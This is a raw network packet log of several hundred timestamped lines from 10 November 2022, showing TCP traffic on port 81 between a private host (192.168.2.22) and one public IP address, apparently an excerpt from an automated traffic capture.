Nov 10, 2022 11:43:11.864124060 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864149094 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864155054 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864156008 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864180088 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864202976 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864204884 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864229918 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864237070 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864263058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864269018 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864284039 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864290953 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864310980 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864317894 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864345074 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864346027 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864372969 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864382029 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864382029 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864399910 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864423037 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864427090 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864454985 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864456892 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864481926 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864490032 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864490032 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864510059 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864528894 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864533901 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864559889 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864564896 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864588022 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864602089 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864614010 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864640951 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864649057 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864649057 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864669085 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864682913 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864682913 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864696980 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864725113 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864727020 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864752054 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864762068 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864763021 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864779949 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864801884 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864806890 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864834070 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864836931 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864852905 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864861012 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864892960 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864908934 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864909887 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864917040 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864943027 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864943981 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864974022 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.864974022 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.864995003 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865000963 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865027905 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865031958 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865055084 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865082026 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865082026 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865082026 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865103006 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865108013 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865135908 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865144968 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865145922 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865161896 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865180969 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865187883 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865215063 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865226030 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865226030 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865241051 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865255117 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865269899 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865294933 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865297079 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865324974 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865334988 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865335941 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865351915 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865375996 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865377903 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865395069 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865406990 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865432024 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865433931 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865461111 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865473032 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865473986 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865488052 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865502119 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865514040 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865536928 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865540028 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865566969 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865575075 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865612030 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865612030 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865612030 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865639925 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865652084 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865664959 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865681887 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865693092 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865709066 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865724087 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865747929 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865751982 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865767002 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865777969 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.865806103 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.865932941 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.872692108 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.900739908 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.900815010 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.900856972 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.900896072 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.900965929 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901002884 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901040077 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901060104 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901060104 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901060104 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901087999 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901130915 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901138067 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901138067 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901139021 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901139021 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901165962 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901175022 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901206970 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901216984 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901266098 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901266098 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901284933 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901309013 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901338100 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901356936 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901376009 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901401043 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901420116 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901443958 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901463985 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901487112 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901487112 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901530027 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901547909 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901571989 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901571989 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901614904 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901633024 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901658058 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901674986 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901701927 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901716948 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901745081 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901760101 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901786089 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901806116 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901829958 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901848078 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901873112 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901890993 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901912928 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.901915073 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901958942 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.901974916 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.902002096 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.902021885 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.902046919 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.902066946 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.902107954 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.921459913 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.921533108 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.921576023 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.921617985 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.921669006 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.921713114 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.921799898 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.921799898 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.921864033 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.921909094 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.921931982 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.921952009 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.921958923 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.921993017 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.922034979 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.922049046 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.922080040 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.922122955 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.922130108 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.922164917 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.922205925 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.922221899 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.922246933 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.922286987 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.922293901 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.922327995 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.922379017 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.922384024 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.922420979 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.922463894 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.922470093 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.924036980 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924094915 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924129963 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.924151897 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924211025 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.924213886 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924274921 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924324036 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.924336910 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924386978 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924431086 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924463034 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924499035 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.924506903 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924546957 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924560070 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.924588919 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924632072 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924642086 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.924674034 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924715042 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924721956 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.924757004 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924797058 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924796104 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.924839973 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924880981 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924896955 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.924922943 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924968004 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.924976110 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.925009012 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925055027 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925070047 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.925096035 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925137043 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925156116 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.925178051 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925219059 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925232887 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.925261021 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925303936 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925307989 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.925343990 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925385952 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925396919 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.925427914 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925468922 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925478935 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.925509930 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925550938 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925561905 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.925592899 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925635099 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925646067 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.925674915 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925718069 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925749063 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.925759077 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925800085 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925811052 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.925841093 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925882101 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925890923 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.925924063 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925966024 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.925971985 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.926054001 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.926096916 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.926105976 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.926139116 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.926181078 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.926186085 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.926222086 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.926263094 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.926270962 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.926304102 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.926346064 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.926358938 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.926387072 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.926428080 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.926462889 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.926469088 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.926511049 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.926520109 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.926552057 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.926593065 CET	81	49172	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.926603079 CET	49172	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965358019 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965390921 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965406895 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965425014 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965441942 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965459108 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965495110 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965514898 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965533972 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965552092 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965572119 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965589046 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965607882 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965629101 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965647936 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965665102 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965683937 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965702057 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965706110 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965706110 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965706110 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965706110 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965706110 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965706110 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965706110 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965706110 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965719938 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965738058 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965749025 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965749025 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965749979 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965749979 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965749979 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965755939 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965764046 CET	49171	81	192.168.2.22	206.81.11.20
Nov 10, 2022 11:43:11.965774059 CET	81	49171	206.81.11.20	192.168.2.22
Nov 10, 2022 11:43:11.965785027 CET	49171	81	192.168.2.22	206.81.11.20
